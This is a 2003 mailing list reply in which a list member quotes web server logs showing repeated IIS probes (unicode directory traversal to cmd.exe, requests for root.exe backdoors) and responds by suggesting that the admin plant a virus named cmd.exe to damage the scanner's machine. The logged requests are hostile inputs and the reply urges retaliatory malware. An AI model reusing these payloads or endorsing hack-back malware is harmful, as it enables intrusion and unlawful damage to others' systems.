[ale] Abuse

Stephen Turner artic_knight at yahoo.com
Wed May 14 19:32:53 EDT 2003



> > >
> > >
> > > Hey guys,
> > >
> > > This is my first post to the list but I have been reading your
> messages
> > > for a while. Here is my first question for you guys:
> > > This guy has been running this script (or whatever he is running)
> for a
> > > few months now. It is an everyday occurance and he is starting to
> get on
> > > my nerves. I can do a reverse lookup on his IP and report him to his
> > > ISP, but I don't know if he is worth it. Here are two lines from my
> log:
> > > 24.98.237.56 - - [13/May/2003:10:35:25 -0400] "GET
> > > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
> > > 24.98.237.56 - - [13/May/2003:10:35:24 -0400] "GET
> > > /scripts/root.exe?/c+dir HTTP/1.0" 404 283
> > > 24.98.237.56 - - [13/May/2003:10:35:24 -0400] "GET
> > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
> > > 24.98.237.56 - - [13/May/2003:10:35:24 -0400] "GET
> > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
> > >
> > > Yours,
> > > Emil P. Man
> > > admin at synban.com
> > >
> > >
is it trying to get file cmd.exe? if so why not write a virous to trash /
screw with his system? and name it cmd.exe and place it in that directory
;) i mean after all if its just a script and someones trying to hack you
what can they do? THEY broke into your system and THEY dl a virous that
THEY werent supposed to have access to ;) id love to see thier explination
if they tried to report that! 

__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com
_______________________________________________
Ale mailing list
Ale at ale.org
http://www.ale.org/mailman/listinfo/ale





More information about the Ale mailing list